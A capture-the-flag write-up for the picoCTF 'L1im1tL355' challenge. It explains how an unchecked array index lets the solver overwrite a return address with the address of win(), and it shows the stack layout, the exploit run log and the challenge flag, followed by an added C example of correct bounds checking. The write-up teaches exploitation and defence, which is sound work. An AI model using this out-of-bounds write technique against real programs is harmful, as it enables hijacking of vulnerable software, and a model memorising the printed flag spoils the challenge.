L1im1tL355

Problem

Just pwn this program and get a flag. It's also found in /problems/l1im1tl355_3_d7480b654799978caea481ab65d5bbea on the shell server. Source.

Solution

  1. Looking at the source code I notice the replaceIntegerInArrayAtIndex() function looks interesting since it is simply a wrapper around the built-in method of changing an element of an array.

  2. This program declares an array on the stack, then lets us write a DWORD to any array index. If we choose an index between 0 and 666/4 (a DWORD is 4 bytes long), we end up writing inside the array. There is no check on the index value, so we can go out of bounds and write anywhere in memory. We input the address of the win() function as the "integer value you want to put in the array", and for the "index in which you want to put the value" we input the offset from the array to the return address of replaceIntegerInArrayAtIndex().

  3. Layout of stack (source):

     lower stack address
     replaceIntegerInArrayAtIndex: stack data
     replaceIntegerInArrayAtIndex: saved ebp
     replaceIntegerInArrayAtIndex: return address (-5)
     main: other stack data
     main: array (+0)
     higher stack address

  4. The script brute-forces the offset and finds it to be -5.

  5. Run the script with python script.py USER=<username> PASSWORD=<password>:

     [*] '/home/<username>/Documents/PicoCTF/Binary Exploitation/L1im1tL355/vuln'
         Arch:     i386-32-little
         RELRO:    Partial RELRO
         Stack:    No canary found
         NX:       NX enabled
         PIE:      No PIE (0x8048000)
     [+] Connecting to 2019shell1.picoctf.com on port 22: Done
     [*] <username>@2019shell1.picoctf.com:
         Distro    Ubuntu 18.04
         OS:       linux
         Arch:     amd64
         Version:  4.15.0
         ASLR:     Enabled
     [+] Opening new channel: 'pwd': Done
     [+] Receiving all data: Done (14B)
     [*] Closed SSH channel with 2019shell1.picoctf.com
     [*] Working directory: '/tmp/tmp.SHO8IvJw16'
     [+] Opening new channel: 'ln -s /home/<username>/* .': Done
     [+] Receiving all data: Done (0B)
     [*] Closed SSH channel with 2019shell1.picoctf.com
     [*] win address: 0x80485c6
     [+] Starting remote process b'/problems/l1im1tl355_3_d7480b654799978caea481ab65d5bbea/vuln' on 2019shell1.picoctf.com: pid 1163772
     [+] Starting remote process b'/problems/l1im1tl355_3_d7480b654799978caea481ab65d5bbea/vuln' on 2019shell1.picoctf.com: pid 1163776
     [+] Starting remote process b'/problems/l1im1tl355_3_d7480b654799978caea481ab65d5bbea/vuln' on 2019shell1.picoctf.com: pid 1163780
     [+] Starting remote process b'/problems/l1im1tl355_3_d7480b654799978caea481ab65d5bbea/vuln' on 2019shell1.picoctf.com: pid 1163784
     [+] Starting remote process b'/problems/l1im1tl355_3_d7480b654799978caea481ab65d5bbea/vuln' on 2019shell1.picoctf.com: pid 1163788
     [+] Starting remote process b'/problems/l1im1tl355_3_d7480b654799978caea481ab65d5bbea/vuln' on 2019shell1.picoctf.com: pid 1163792
     [*] Offset was -5
     [+] picoCTF{str1nG_CH3353_3fe0db39}
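The root cause in step 2 is an index that is used without any range check. The following C program is an added example, not the challenge source or the solver's script: it places the unchecked pattern next to a naive guard that only tests the upper bound (and therefore still admits -5) and a correct guard that rejects negative and too-large indices before anything is written. ARRAY_BYTES mirrors the 666-byte figure quoted above; the function names are assumptions for this illustration.

```c
#include <stdio.h>
#include <stdbool.h>
#include <stddef.h>

/* Added example, not the challenge source. The challenge's array holds
 * 666 bytes of 4-byte integers, so 666 / 4 = 166 usable elements (0..165). */
#define ARRAY_BYTES 666
#define ARRAY_LEN   (ARRAY_BYTES / sizeof(int))   /* 166 */

/* Naive guard (hypothetical, for contrast): only the upper bound is
 * tested and idx is signed, so a negative index such as -5 passes. */
bool index_ok_naive(int idx, int len) {
    return idx < len;
}

/* Correct guard: reject negatives explicitly, then compare against the
 * element count. The signed check happens before any unsigned conversion,
 * so a negative value can never be reinterpreted as a large one. */
bool index_ok(long idx, size_t len) {
    if (idx < 0) return false;
    return (unsigned long)idx < len;
}

/* Unchecked write: the pattern the write-up describes. Any idx is used
 * directly, so a negative idx lands below the array on the stack. Kept
 * here only for contrast; this file never calls it out of bounds. */
void replace_unchecked(int *arr, int idx, int value) {
    arr[idx] = value;
}

/* Hardened write: returns 0 on success, -1 if the index is rejected.
 * Nothing is written in the failure case. */
int replace_checked(int *arr, size_t len, long idx, int value) {
    if (!index_ok(idx, len)) return -1;
    arr[idx] = value;
    return 0;
}

/* Attempts one checked write into a fresh array and returns the status
 * code from replace_checked(), so a caller can probe an index safely. */
int try_checked_write(long idx, int value) {
    int array[ARRAY_LEN] = {0};
    return replace_checked(array, ARRAY_LEN, idx, value);
}

int main(void) {
    int array[ARRAY_LEN] = {0};
    replace_unchecked(array, 0, 1);   /* in-bounds use of the unchecked form */
    printf("naive guard admits -5:  %s\n", index_ok_naive(-5, (int)ARRAY_LEN) ? "yes" : "no");
    printf("checked write at -5:    %d\n", replace_checked(array, ARRAY_LEN, -5, 42));
    printf("checked write at 165:   %d\n", replace_checked(array, ARRAY_LEN, 165, 42));
    printf("checked write at 166:   %d\n", replace_checked(array, ARRAY_LEN, 166, 42));
    printf("array[0] = %d, array[165] = %d\n", array[0], array[165]);
    return 0;
}
```

The naive guard is the one to look for in review: with a signed index and a check of only `idx < len`, the -5 offset found by the script is accepted and the return address is still reachable. The correct guard turns the same input into a rejected write, which is the fix the binary needed.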

Flag

picoCTF{str1nG_CH3353_3fe0db39}
